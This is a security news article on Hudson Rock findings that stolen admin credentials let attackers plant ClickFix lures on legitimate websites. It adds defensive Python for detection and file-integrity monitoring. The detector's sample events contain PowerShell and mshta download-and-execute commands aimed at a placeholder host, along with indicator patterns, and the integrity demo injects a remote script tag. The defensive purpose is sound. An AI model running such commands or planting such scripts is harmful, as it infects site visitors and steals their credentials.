Stolen Credentials Fuel Self-Sustaining Malware Distribution
Hudson Rock research reveals 220 legitimate business websites hijacked for ClickFix malware attacks after admin credentials were stolen by infostealers.
A dangerous feedback loop has emerged in cybercrime operations: infostealers compromise business owners, steal their website credentials, and attackers then use those credentials to turn legitimate websites into malware distribution platforms—which deploy more infostealers, creating a self-sustaining cycle.
Research published this week by the Hudson Rock Threat Intelligence Team reveals the scale of this problem. Of 1,635 malicious domains tracked that were using the ClickFix technique, 220 were legitimate business websites whose administrative credentials appeared in infostealer logs. That's 13% of active malware distribution infrastructure running on hijacked legitimate domains.
What Is ClickFix
ClickFix is a social engineering technique that tricks users into executing malicious code through their own actions. When victims visit a compromised website, they encounter what appears to be a Google reCAPTCHA verification or browser error message.
The fake prompt is convincing enough that many users follow its instructions. Behind the scenes, malicious JavaScript has already copied a PowerShell command to the victim's clipboard. The prompt then asks users to press Windows+R and paste a "verification code" using Ctrl+V.
What actually happens: the victim executes a PowerShell command that downloads and installs infostealer malware—Lumma, Vidar, or Stealc, typically. No exploits required. No zero-days needed. Just social engineering that works.
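As an added defender-side example (not code from the article or from Hudson Rock), the following Python scores process-creation events for the pattern described above: an interpreter launched from the Run dialog, so explorer.exe is the parent, combined with download-and-execute indicators on the command line. The Sysmon-style event records are constructed for illustration.

```python
"""Added example, not code from the article or Hudson Rock: flag process-creation
events matching the ClickFix pattern described above (a shell launched from the
Run dialog, so explorer.exe is the parent, with download-and-execute indicators)."""
import re
# Constructed Sysmon-style Event ID 1 records; none come from a real incident.
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://example.invalid/v)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
]

# Interpreters a ClickFix prompt typically has the victim start from Win+R.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Command-line indicators of a hidden download-and-execute cradle.
INDICATORS = [re.compile(p, re.I) for p in (
    r"\biex\b", r"invoke-expression", r"\biwr\b", r"invoke-webrequest",
    r"downloadstring", r"-enc(odedcommand)?\b", r"-w(indowstyle)?\s+hidden",
    r"https?://")]

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons). The explorer.exe parent is required because that
    is what a Run-dialog launch looks like; each matching indicator adds one."""
    if basename(ev["ParentImage"]) != "explorer.exe" or basename(ev["Image"]) not in SHELLS:
        return 0, []
    reasons = ["shell launched from explorer.exe (Run dialog)"]
    reasons += ["indicator: " + rx.pattern for rx in INDICATORS if rx.search(ev["CommandLine"])]
    return len(reasons), reasons

def find_clickfix(events, threshold=2):
    """Events scoring at least `threshold`, i.e. the parent match plus one indicator."""
    hits = []
    for ev in events:
        score, why = score_event(ev)
        if score >= threshold:
            hits.append((basename(ev["Image"]), score, why))
    return hits

if __name__ == "__main__":
    for name, score, why in find_clickfix(EVENTS):
        print(f"{name} score={score}: {'; '.join(why)}")
```

The scheduled backup launched from cmd.exe scores zero, which is the point of requiring the explorer.exe parent rather than alerting on every PowerShell start.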
Microsoft's 2025 Digital Defense Report found ClickFix has become the most common initial access method, accounting for 47% of all initial compromise techniques observed. The technique has even been adopted by nation-state actors like North Korea's Lazarus group for targeted attacks against cryptocurrency companies.
How Legitimate Websites Get Compromised
The attack chain starts with an infected business owner or administrator. Infostealer malware harvests credentials stored in browsers, password managers, and application configuration files. Those credentials often include:
- WordPress admin panel logins
- cPanel and hosting control panel access
- CMS authentication tokens
- FTP and SSH credentials
Once attackers obtain administrative access, they inject ClickFix scripts into the legitimate website. Visitors see fake verification prompts, execute the malicious commands, and get infected themselves. Their credentials then enter the same infostealer ecosystem, potentially compromising more websites.
Hudson Rock documented specific examples:
jrqsistemas.com - Currently hosting an active ClickFix campaign. The site's WordPress administrator credentials were previously stolen by infostealer malware. Attackers used those valid credentials to upload malicious scripts.
wo.cementah.com - Same pattern. Harvested administrative credentials enabled unauthorized access for malware hosting.
Why This Matters
Compromised legitimate domains bypass many security controls that would block newly registered or obviously suspicious domains. Business websites build trust with email security gateways, web filters, and reputation systems over months or years. When those same domains start serving malware, they often sail through defenses.
The feedback loop also complicates takedown efforts. Traditional malware domains can be reported and blocked relatively quickly. But legitimate businesses may not realize their sites are compromised, may not have the technical expertise to remove malicious code, or may delay action to avoid disrupting their operations.
Every successful infection generates more credentials. More credentials mean more compromised websites. More compromised websites mean more distribution points for the same infostealers that started the cycle. Evasion tactics are getting creative across the board—GootLoader used over 1,000 ZIP archives to scatter payloads and dodge detection.
Who Is Getting Hit
Infostealers aren't picky about targets. Small businesses running WordPress sites without dedicated IT support make easy victims. But the credential harvesting affects organizations of all sizes—any administrator who gets infected potentially exposes their organization's web infrastructure.
According to Flashpoint data, information-stealing malware was responsible for 2.1 billion stolen credentials in 2024—75% of that year's total credential theft. Prolific strains like RisePro, StealC, and Lumma compromised 23 million hosts and devices. Lumma Stealer's operators went creative too, using a disguised 'Ninja Browser' and Google Groups for C2 communication.
The phishing techniques that deliver infostealers have also improved. Attackers use AI to craft convincing lures, exploit trusted platforms like Google Cloud to bypass email security, and time campaigns for maximum impact during holidays and weekends.
Breaking the Cycle
For businesses running websites:
- Enable multi-factor authentication on all administrative interfaces. MFA won't help if the session is already hijacked, but it raises the bar significantly.
- Monitor website file integrity. Services that detect unauthorized changes to site files can catch injected malware before it affects visitors.
- Isolate administrative credentials. Don't log into website admin panels from the same browser or machine used for general work. Consider dedicated admin workstations or virtual machines.
- Audit admin accounts. Remove accounts for employees who've left. Check for unauthorized accounts that may have been created by attackers.
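To show what the file-integrity item above looks like in practice, here is an added example (not code from the article or Hudson Rock) that snapshots a web root by SHA-256 and reports files added, modified or removed since the baseline. The WordPress-like directory layout and the injected changes are constructed in a temporary directory.

```python
"""Added example, not from the article or Hudson Rock: a minimal file-integrity
baseline for a web root, flagging files added, modified or removed since the
baseline was taken. The site layout below is constructed in a temp directory."""
import hashlib, json, os, tempfile

def snapshot(root):
    """Map each relative file path under `root` to its SHA-256 hex digest."""
    hashes = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            hashes[rel] = digest
    return hashes

def compare(baseline, current):
    """Return {'added': [...], 'modified': [...], 'removed': [...]}, each sorted."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p in current if p in baseline and current[p] != baseline[p]),
        "removed": sorted(p for p in baseline if p not in current),
    }

def demo():
    """Simulate a site where one theme file is altered and one new file appears
    after the baseline was taken; returns the diff so it can be checked."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "site")
        os.makedirs(theme)
        footer = os.path.join(theme, "footer.php")
        with open(footer, "w") as fh:
            fh.write("<footer>ok</footer>\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php require 'wp-blog-header.php';\n")
        baseline = snapshot(root)
        # Constructed post-compromise changes: an appended tag and a dropped file.
        with open(footer, "a") as fh:
            fh.write("<script src='//example.invalid/v.js'></script>\n")
        with open(os.path.join(root, "wp-content", "cache.php"), "w") as fh:
            fh.write("<?php /* constructed placeholder for an injected file */\n")
        return compare(baseline, snapshot(root))

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

In production the baseline would be written out (for example as JSON) right after a known-good deploy and compared on a schedule, with a refreshed baseline after every legitimate update.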
For users:
Never run commands or scripts copied from websites. Legitimate verification processes don't ask you to open Run dialogs or paste clipboard contents. Any prompt requesting this is almost certainly malicious.
The 220 compromised domains Hudson Rock identified represent just what's currently visible. The actual number of legitimate websites serving malware is certainly higher—and growing with every successful infostealer infection.